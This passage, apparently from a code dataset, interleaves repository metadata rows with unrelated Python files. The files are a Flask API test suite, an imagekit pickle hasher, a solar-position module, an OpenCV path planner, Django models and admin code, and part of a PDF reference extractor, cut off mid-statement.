"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response2)
software_id = response2.json['id']
software_min_version_id = response2.json["versions"][0]["id"]
software_max_version_id = response2.json["versions"][1]["id"]
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({
"software" : "foo",
"min_version": "1.0",
"max_version": "1.1"}))
self.assert_created(response3)
response4 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/")
self.assert_ok(response4)
self.assertEqual(response4.json, [
{
"software": {
"software": "foo",
"id": software_id
},
"max_version": {
"version": "1.1",
"id": software_max_version_id
},
"min_version": {
"version": "1.0",
"id": software_min_version_id
},
"jobtype_version": {
"version": 2,
"jobtype": "TestJobType",
}
}
])
def test_jobtype_by_id_post_requirement(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": []
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/%s/software_requirements/" % id,
content_type="application/json",
data=dumps({"software" : "foo"}))
self.assert_created(response3)
def test_jobtype_versioned_post_requirement(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/versions/1/software_requirements/",
content_type="application/json",
data=dumps({"software" : "foo"}))
self.assert_method_not_allowed(response3)
def test_jobtype_post_requirement_unknown_jobtype(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": []
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/jobtypes/UnknownJobType/software_requirements/",
content_type="application/json",
data=dumps({"software" : "foo"}))
self.assert_not_found(response2)
def test_jobtype_post_requirement_no_versions(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.delete("/api/v1/jobtypes/TestJobType/versions/1")
self.assert_no_content(response2)
response3 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response3)
response4 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software" : "foo"}))
self.assert_not_found(response4)
def test_jobtype_post_requirement_bad_software(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({}))
self.assert_bad_request(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": 42}))
self.assert_bad_request(response3)
def test_jobtype_post_requirement_unknown_software(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": "unknown software"}))
self.assert_not_found(response2)
def test_jobtype_post_requirement_with_existing(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [{
"software" : "foo",
"min_version": "1.0",
"max_version": "1.1"}]
}))
self.assert_created(response2)
response2 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "bar",
"versions": [
{"version": "0.1"},
{"version": "0.2"}
]
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software" : "bar",
"min_version": "0.1",
"max_version": "0.2"}))
self.assert_created(response3)
response4 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/")
self.assert_ok(response4)
self.assertEqual(len(response4.json), 2)
def test_jobtype_post_requirement_conflict(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [{"software" : "foo"}]
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software" : "foo"}))
self.assert_conflict(response3)
def test_jobtype_post_requirement_bad_min_version(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": "foo",
"min_version": 42}))
self.assert_bad_request(response3)
def test_jobtype_post_requirement_unknown_min_version(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": "foo",
"min_version": "1.0"}))
self.assert_not_found(response3)
def test_jobtype_post_requirement_bad_max_version(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": "foo",
"max_version": 42}))
self.assert_bad_request(response3)
def test_jobtype_post_requirement_unknown_max_version(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": "foo",
"max_version": "1.0"}))
self.assert_not_found(response3)
def test_jobtype_get_single_requirement(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
software_id = response1.json['id']
software_min_version_id = response1.json["versions"][0]["id"]
software_max_version_id = response1.json["versions"][1]["id"]
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/foo")
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"software": {
"software": "foo",
"id": software_id
},
"max_version": {
"version": "1.1",
"id": software_max_version_id
},
"min_version":
{
"version": "1.0",
"id": software_min_version_id
},
"jobtype_version": {
"version": 1,
"jobtype": "TestJobType",
}
})
response4 = self.client.get(
"/api/v1/jobtypes/%s/software_requirements/foo" % id)
self.assert_ok(response4)
def test_jobtype_single_requirement_unknown_jobtype(self):
response1 = self.client.get(
"/api/v1/jobtypes/UnknownJobType/software_requirements/1")
self.assert_not_found(response1)
def test_jobtype_single_requirement_no_versions(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.delete("/api/v1/jobtypes/TestJobType/versions/1")
self.assert_no_content(response2)
response3 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/1")
self.assert_not_found(response3)
def test_jobtype_single_requirement_not_found(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/1")
self.assert_not_found(response2)
def test_jobtype_delete_requirement(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "bar",
"versions": [
{"version": "0.1"},
{"version": "0.2"}
]
}))
self.assert_created(response2)
response3 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
},
{
"software": "bar",
"min_version": "0.1",
"max_version": "0.2"
}
]
}))
self.assert_created(response3)
id = response3.json['id']
response4 = self.client.delete(
"/api/v1/jobtypes/TestJobType/software_requirements/foo")
self.assert_no_content(response4)
response5 = self.client.delete(
"/api/v1/jobtypes/TestJobType/software_requirements/foo")
self.assert_no_content(response5)
response6 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/foo")
self.assert_not_found(response6)
response7 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/bar")
self.assert_ok(response7)
def test_jobtype_by_id_delete_requirement(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{"software": "foo"}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.delete(
"/api/v1/jobtypes/%s/software_requirements/foo" % id)
self.assert_no_content(response3)
response4 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/")
self.assertEqual(len(response4.json), 0)
def test_jobtype_delete_requirement_unknown_jobtype(self):
response1 = self.client.delete(
"/api/v1/jobtypes/UnknownJobType/software_requirements/1")
self.assert_not_found(response1)
def test_jobtype_delete_requirement_no_versions(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.delete("/api/v1/jobtypes/TestJobType/versions/1")
self.assert_no_content(response2)
response3 = self.client.delete(
"/api/v1/jobtypes/TestJobType/software_requirements/1")
self.assert_not_found(response3)
| 37.6834
| 81
| 0.473592
| 64,731
| 0.979897
| 0
| 0
| 0
| 0
| 0
| 0
| 19,930
| 0.3017
|
4231fa59a3b40941c8f8953e4a8dd3df4f032a6f
| 742
|
py
|
Python
|
imagekit/hashers.py
|
radicalgraphics/django-imagekit
|
e36290b4eef1faaf6ad864d3493df1458ef96fbb
|
[
"BSD-3-Clause"
] | null | null | null |
imagekit/hashers.py
|
radicalgraphics/django-imagekit
|
e36290b4eef1faaf6ad864d3493df1458ef96fbb
|
[
"BSD-3-Clause"
] | null | null | null |
imagekit/hashers.py
|
radicalgraphics/django-imagekit
|
e36290b4eef1faaf6ad864d3493df1458ef96fbb
|
[
"BSD-3-Clause"
] | null | null | null |
from copy import copy
from hashlib import md5
from pickle import Pickler, MARK, DICT
from types import DictionaryType
from .lib import StringIO
class CanonicalizingPickler(Pickler):
dispatch = copy(Pickler.dispatch)
def save_set(self, obj):
rv = obj.__reduce_ex__(0)
rv = (rv[0], (sorted(rv[1][0]),), rv[2])
self.save_reduce(obj=obj, *rv)
dispatch[set] = save_set
def save_dict(self, obj):
write = self.write
write(MARK + DICT)
self.memoize(obj)
self._batch_setitems(sorted(obj.iteritems()))
dispatch[DictionaryType] = save_dict
def pickle(obj):
file = StringIO()
CanonicalizingPickler(file, 0).dump(obj)
return md5(file.getvalue()).hexdigest()
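# Note: this module targets Python 2 (types.DictionaryType, dict.iteritems and
# a protocol-0 Pickler). A minimal usage sketch under that assumption:
#
#     >>> pickle({'b': 2, 'a': 1}) == pickle({'a': 1, 'b': 2})
#     True
#
# Dict items and set elements are sorted before pickling, so logically equal
# containers hash to the same md5 digest regardless of insertion order.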
| 23.1875
| 53
| 0.661725
| 465
| 0.626685
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
423268278bdfbc38d38322d8349807e008e76abd
| 1,262
|
py
|
Python
|
sun.py
|
funxiun/AstroAlgorithms4Python
|
98098956daba2706c993fa6370d8cdfa4013cb8d
|
[
"Unlicense"
] | 7
|
2018-09-29T11:35:40.000Z
|
2022-01-11T14:06:44.000Z
|
sun.py
|
funxiun/AstroAlgorithms4Python
|
98098956daba2706c993fa6370d8cdfa4013cb8d
|
[
"Unlicense"
] | null | null | null |
sun.py
|
funxiun/AstroAlgorithms4Python
|
98098956daba2706c993fa6370d8cdfa4013cb8d
|
[
"Unlicense"
] | 8
|
2018-09-29T11:36:01.000Z
|
2021-10-17T15:25:55.000Z
|
'''Meeus: Astronomical Algorithms (2nd ed.), chapter 25'''
import math
from nutation_ecliptic import ecliptic
from constants import AU
def coordinates(jd):
'''equatorial coordinates of Sun'''
lon=math.radians(longitude(jd))
eps=math.radians(ecliptic(jd))
ra=math.degrees(math.atan2(math.cos(eps)*math.sin(lon),math.cos(lon)))
dec=math.degrees(math.asin(math.sin(eps)*math.sin(lon)))
return ra,dec
def longitude(jd):
'''longitude of Sun'''
T=(jd-2451545)/36525.
L=math.radians(280.46646+36000.76983*T+0.0003032*T**2)
M=math.radians(357.52911+35999.05029*T-0.0001537*T**2)
C=math.radians((1.914602-0.004817*T-0.000014*T**2)*math.sin(M)+(0.019993-0.000101*T)*math.sin(2*M)+0.000289*math.sin(3*M))
lon=L+C
return math.degrees(lon)
def distance(jd,km=True):
'''Earth-Sun distance (in km by default; in AU if km=False)'''
T=(jd-2451545)/36525.
e=0.016708634-0.000042037*T-0.0000001267*T**2
M=math.radians(357.52911+35999.05029*T-0.0001537*T**2)
C=math.radians((1.914602-0.004817*T-0.000014*T**2)*math.sin(M)+(0.019993-0.000101*T)*math.sin(2*M)+0.000289*math.sin(3*M))
nu=M+C
R=1.000001018*(1-e**2)/(1+e*math.cos(nu))
if km: R*=AU
return R
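# Minimal usage sketch (illustrative; assumes the sibling modules
# nutation_ecliptic and constants imported above are importable):
#
#     jd = 2451545.0                   # J2000.0 epoch
#     ra, dec = coordinates(jd)        # apparent solar RA/Dec in degrees
#     r_km = distance(jd)              # Earth-Sun distance in km
#     r_au = distance(jd, km=False)    # same distance in AU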
| 26.291667
| 126
| 0.62916
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 145
| 0.114897
|
4233e43b1aa8c3735bfa71a29e6ebbf01825729f
| 5,681
|
py
|
Python
|
test/paths.py
|
cychitivav/kobuki_navigation
|
9da1ad425b8804b49005720594e9837295eb9976
|
[
"MIT"
] | null | null | null |
test/paths.py
|
cychitivav/kobuki_navigation
|
9da1ad425b8804b49005720594e9837295eb9976
|
[
"MIT"
] | null | null | null |
test/paths.py
|
cychitivav/kobuki_navigation
|
9da1ad425b8804b49005720594e9837295eb9976
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import numpy as np
import cv2
from matplotlib import pyplot as plt
import networkx as nx
def rotate_image(image, angle):
image_center = tuple(np.array(image.shape[0:2]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1)
vertical = cv2.warpAffine(image, rot_mat, image.shape[0:2], flags=cv2.INTER_CUBIC)
im = vertical.copy()
for i in range(image.shape[0]):
for j in range(image.shape[1]):
if i < 100 or j < 100 or j > 924 or i > 924:
im[i,j] = 205
else:
neighbor = 0
if vertical[i+1,j] < 43.0:
neighbor += 1
if vertical[i-1,j] < 43.0:
neighbor += 1
if vertical[i+1,j-1] < 43.0:
neighbor += 1
if vertical[i+1,j+1] < 43.0:
neighbor += 1
if vertical[i-1,j+1] < 43.0:
neighbor += 1
if vertical[i-1,j-1] < 43.0:
neighbor += 1
if vertical[i,j+1] < 43.0:
neighbor += 1
if vertical[i,j-1] < 43.0:
neighbor += 1
if neighbor >= 5:
im[i,j] = 0
return im
if __name__ == "__main__":
image = cv2.imread('map/map.pgm', 0)
rotated = rotate_image(image, -7.66)
#cv2.imwrite('map/rotated.pgm', rotated)
_, th = cv2.threshold(rotated, 245, 255, cv2.THRESH_BINARY)
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3,3))
op = cv2.morphologyEx(th, cv2.MORPH_OPEN, kernel)
skel = cv2.ximgproc.thinning(op)
plt.figure()
plt.subplot(1,3,1)
plt.imshow(image, cmap='gray')
plt.axis('off')
plt.title('Original')
plt.subplot(1,3,2)
plt.imshow(rotated, cmap='gray')
plt.axis('off')
plt.title('Rotada')
plt.subplot(1,3,3)
plt.imshow(skel, cmap='gray')
plt.axis('off')
plt.title('Adelgazada')
base = cv2.dilate(skel, None, iterations=12)
path = cv2.cvtColor(base, cv2.COLOR_GRAY2RGB)
corners = cv2.cornerHarris(skel,7,7,0.04)
corners = cv2.dilate(corners, None)
_, corners = cv2.threshold(corners,0.001,255,cv2.THRESH_BINARY)
corners = np.uint8(corners)
contours, _ = cv2.findContours(corners,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
path[corners>0.0]=[0,255,0]
cv2.drawContours(path,contours,-1,(255,0,0),1)
G = nx.Graph()
points = []
for i, c in enumerate(contours):
# calculate moments for each contour
M = cv2.moments(c)
# calculate x,y coordinate of center
cX = int(round(M["m10"] / M["m00"]))
cY = int(round(M["m01"] / M["m00"]))
path[cY,cX]=[0,0,255]
G.add_node(i, pos=(cX,cY))
points.append((cX,cY))
font = cv2.FONT_HERSHEY_SIMPLEX
fontScale = 0.4
fontColor = (0,0,255)
thickness = 1
path = cv2.putText(path, str(i), (cX,cY), font, fontScale, fontColor, thickness)
plt.figure()
plt.subplot(1,2,1)
plt.imshow(base,cmap='gray')
plt.axis('off')
plt.title('Imagen base')
plt.subplot(1,2,2)
plt.imshow(path)
plt.axis('off')
plt.title('Esquinas')
noBlack = cv2.countNonZero(cv2.cvtColor(path,cv2.COLOR_BGR2GRAY))
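# Visibility test: two corner nodes get an edge only if the straight segment
# between them stays inside the white (free) region of the dilated skeleton;
# drawing the segment on a copy must leave the non-zero pixel count unchanged.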
for i, p1 in enumerate(points):
for j, p2 in enumerate(points):
if p1 == p2: continue
test_img = cv2.line(path.copy(), p1, p2, (234,0,234), 1)
# Recount to see if the images are the same
if cv2.countNonZero(cv2.cvtColor(test_img,cv2.COLOR_BGR2GRAY)) == noBlack:
# path = cv2.line(path, p1, p2, (234,0,234), 1)
G.add_edge(i,j,weight=np.hypot(p1[0]-p2[0], p1[1]-p2[1]))
plt.figure()
nx.draw(G,with_labels=True)
x_0, y_0 = [492,500]
x_f = np.random.randint(487) + 277
y_f = np.random.randint(448) + 368
path[y_0+1,x_0+1] = (255,0,0)
path[y_f+1,x_f+1] = (255,0,0)
_, th = cv2.threshold(rotated, 245, 255, cv2.THRESH_BINARY)
ero = cv2.erode(th,None,iterations=10)
th = ero.copy()
noBlack = cv2.countNonZero(th)
for i, p in enumerate(points):
test_img = cv2.line(th.copy(), (x_0,y_0), p, 234, 1)
# Recount to see if the images are the same
if cv2.countNonZero(test_img) == noBlack:
# path = cv2.line(path, p1, p2, (234,0,234), 1)
G.add_edge('p_0',i,weight=np.hypot(p[0]-x_0, y_0-p[1]))
for i, p in enumerate(points):
test_img = cv2.line(th.copy(), (x_f,y_f), p, 234, 1)
# Recount to see if the images are the same
if cv2.countNonZero(test_img) == noBlack:
# path = cv2.line(path, p1, p2, (234,0,234), 1)
G.add_edge('p_f',i,weight=np.hypot(p[0]-x_f, y_f-p[1]))
plan = nx.shortest_path(G,'p_0','p_f')
print(plan)
for i in range(len(plan)-1):
if i == 0:
path = cv2.line(path, (x_0,y_0), points[plan[i+1]], (251,229,78), 1)
elif i == len(plan)-2:
path = cv2.line(path, points[plan[i]], (x_f,y_f), (251,229,78), 1)
else:
path = cv2.line(path, points[plan[i]], points[plan[i+1]], (251,229,78), 1)
plt.figure()
plt.imshow(ero,cmap='gray')
plt.axis('off')
plt.title('Imagen erosionada')
plt.show()
| 31.38674
| 88
| 0.520155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 594
| 0.104559
|
4233e6b88d45b6951dc540a0e3110566d67aa657
| 458
|
py
|
Python
|
intro-to-programming/python-for-everyone/3-variables-expressions-statements/exercise-4.py
|
udpsunil/computer-science
|
94e3dfc7d39ad139671ab1a3457a61a1fd48fe39
|
[
"MIT"
] | null | null | null |
intro-to-programming/python-for-everyone/3-variables-expressions-statements/exercise-4.py
|
udpsunil/computer-science
|
94e3dfc7d39ad139671ab1a3457a61a1fd48fe39
|
[
"MIT"
] | null | null | null |
intro-to-programming/python-for-everyone/3-variables-expressions-statements/exercise-4.py
|
udpsunil/computer-science
|
94e3dfc7d39ad139671ab1a3457a61a1fd48fe39
|
[
"MIT"
] | null | null | null |
# Assume that we execute the following assignment statements
# width = 17
# height = 12.0
width = 17
height = 12.0
value_1 = width // 2
value_2 = width / 2.0
value_3 = height / 3
value_4 = 1 + 2 * 5
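# Expected results: value_1 = 8 (int, floor division), value_2 = 8.5 (float),
# value_3 = 4.0 (float), value_4 = 11 (int; * binds tighter than +).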
print(f"value_1 is {value_1} and it's type is {type(value_1)}")
print(f"value_2 is {value_2} and it's type is {type(value_2)}")
print(f"value_3 is {value_3} and it's type is {type(value_3)}")
print(f"value_4 is {value_4} and it's type is {type(value_4)}")
| 26.941176
| 63
| 0.68559
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 311
| 0.679039
|
42370720ae2a40bece1dbd04a95205d5f5073cbf
| 131
|
py
|
Python
|
apps/weapons/admin.py
|
tufbel/wFocus
|
ee0f02053b8a5bc9c40dd862306fc5df1a063b9d
|
[
"Apache-2.0"
] | null | null | null |
apps/weapons/admin.py
|
tufbel/wFocus
|
ee0f02053b8a5bc9c40dd862306fc5df1a063b9d
|
[
"Apache-2.0"
] | 11
|
2020-06-06T01:51:51.000Z
|
2022-02-10T14:31:21.000Z
|
apps/weapons/admin.py
|
tufbel/wFocus
|
ee0f02053b8a5bc9c40dd862306fc5df1a063b9d
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
# Register your models here.
from apps.weapons.models import Weapon
admin.site.register(Weapon)
| 18.714286
| 38
| 0.80916
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.21374
|
4237a4d8945ebfffd7fd8c863df2a43bde57f4e3
| 975
|
py
|
Python
|
modules/kubrick/apps/awards/models.py
|
Lab-Quatro/aposcar
|
97631f2e3939566cc4e5b81e50c58ce03a5350a4
|
[
"MIT"
] | 3
|
2021-07-05T14:18:27.000Z
|
2021-09-02T10:15:55.000Z
|
modules/kubrick/apps/awards/models.py
|
Lab-Quatro/aposcar
|
97631f2e3939566cc4e5b81e50c58ce03a5350a4
|
[
"MIT"
] | 1
|
2021-10-31T21:40:39.000Z
|
2021-10-31T21:40:39.000Z
|
modules/kubrick/apps/awards/models.py
|
Lab-Quatro/aposcar
|
97631f2e3939566cc4e5b81e50c58ce03a5350a4
|
[
"MIT"
] | null | null | null |
from django.db import models
class Nominee(models.Model):
name = models.TextField()
picture_url = models.ImageField(upload_to="nominees/")
description = models.TextField(max_length=350)
class Meta:
verbose_name_plural = "nominees"
def __str__(self):
return self.name
class Category(models.Model):
name = models.CharField(max_length=40)
url_field = models.CharField(max_length=40)
class Meta:
verbose_name_plural = "categories"
def __str__(self):
return self.name
class Indication(models.Model):
nominated = models.ForeignKey(Nominee, on_delete=models.CASCADE)
category = models.ForeignKey(
Category, on_delete=models.CASCADE, related_name="indications"
)
year = models.IntegerField()
annotation = models.TextField(blank=True)
is_winner = models.BooleanField(default=False)
def __str__(self):
return f'"{self.nominated.name}" on "{self.category.name}"'
| 25.657895
| 70
| 0.695385
| 937
| 0.961026
| 0
| 0
| 0
| 0
| 0
| 0
| 98
| 0.100513
|
42383a1d8efb06b1b9b9ac90bcfd5e6b24b3d414
| 6,113
|
py
|
Python
|
scholarly_citation_finder/apps/citation/search/PublicationDocumentExtractor.py
|
citationfinder/scholarly_citation_finder
|
3e6c340cfebc934a013759e27d8c145171110156
|
[
"MIT"
] | 1
|
2017-01-23T18:02:42.000Z
|
2017-01-23T18:02:42.000Z
|
scholarly_citation_finder/apps/citation/search/PublicationDocumentExtractor.py
|
citationfinder/scholarly_citation_finder
|
3e6c340cfebc934a013759e27d8c145171110156
|
[
"MIT"
] | null | null | null |
scholarly_citation_finder/apps/citation/search/PublicationDocumentExtractor.py
|
citationfinder/scholarly_citation_finder
|
3e6c340cfebc934a013759e27d8c145171110156
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
from datetime import datetime
from scholarly_citation_finder import config
from scholarly_citation_finder.apps.parser.Parser import Parser
from scholarly_citation_finder.apps.core.models import PublicationUrl
from scholarly_citation_finder.tools.extractor.grobid.GrobidExtractor import GrobidExtractor
from scholarly_citation_finder.lib.file import download_file_pdf, DownloadFailedException, UnexpectedContentTypeException
from scholarly_citation_finder.lib.process import ProcessException
from scholarly_citation_finder.apps.parser.Exceptions import ParserRollbackError
from scholarly_citation_finder.lib.string import normalize_string
from scholarly_citation_finder.tools.extractor.grobid.TeiParser import TeiParserNoDocumentTitle,\
TeiParserNoReferences
from scholarly_citation_finder.tools.nameparser.StringMatching import nearly_match
logger = logging.getLogger(__name__)
class PublicationDocumentExtractor:
'''
Class to extract a document.
'''
NUM_MINIMUM_REFERENCES = 3
def __init__(self, database='default'):
'''
Create object.
:param database: Database name
'''
self.extractor = GrobidExtractor() # used to extract documents
self.parser = Parser(database=database) # used to store results
def extract_and_store(self, publication, url):
'''
Extract the publication from the given URL and store the result.
:param publication:
:param url:
:raise ExtractorNotAvaiableException:
'''
try:
document_meta, references = self.extract(publication.title, publication.id, url=url) # raises ExtractorNotAvaiableException
if document_meta and references:
self.__store_document_meta(publication=publication, document_meta=document_meta)
self.__store_references(publication=publication, url=url, references=references)
return True
# Download failed
except(DownloadFailedException, UnexpectedContentTypeException) as e:
logger.info('{}: {}'.format(type(e).__name__, str(e)))
# Extractor failed
except(ProcessException) as e:
logger.info('{}: {}'.format(type(e).__name__, str(e)))
# Storage failed
except(ParserRollbackError) as e:
logger.warn(e, exc_info=True)
return False
def extract(self, publication_title, publication_id, url):
'''
Try to download the document from the given URL and extract it.
:param publication_title: Title of the publication to check, if it's the correct document
:param publication_id: ID of the publication. Used for the filename of the temporary stored document
:param url: Document URL
:return: Document meta object, references array
False, False if (a) it failed to download the document (b) or the document has no title or references
:raise ProcessException: Extractor failed
:raise ExtractorNotAvaiableException: Extractor is not available
:raise DownloadFailedException: Download failed
:raise UnexpectedContentTypeException: File for given URL has the wrong content type
'''
try:
filename = download_file_pdf(url, path=config.DOWNLOAD_TMP_DIR, name='{}_tmp.pdf'.format(publication_id))
document_meta, references = self.extractor.extract_file(filename, completely=True)
# Check title
document_meta_title = document_meta['publication']['title'].lower().strip()
if not nearly_match(document_meta_title, publication_title):
logger.info('Wrong title! Is "%s", should "%s"' % (document_meta_title, publication_title) )
return False, False
# Check number of references
if len(references) < self.NUM_MINIMUM_REFERENCES:
logger.info('Not enough references')
return False, False
return document_meta, references
# Tei failed (invalid document)
except(TeiParserNoDocumentTitle, TeiParserNoReferences) as e:
logger.info('{}: {}'.format(type(e).__name__, str(e)))
return False, False
def __store_references(self, publication, references, url):
'''
Store the URL and the references.
:param publication: Publication that was extracted
:param references: References list, extracted from the document
:param url: URL of the document that was extracted
:raise ParserRollbackError: Storage (database commit) of the references failed
'''
publication_url = publication.publicationurl_set.create(url=url[:200],
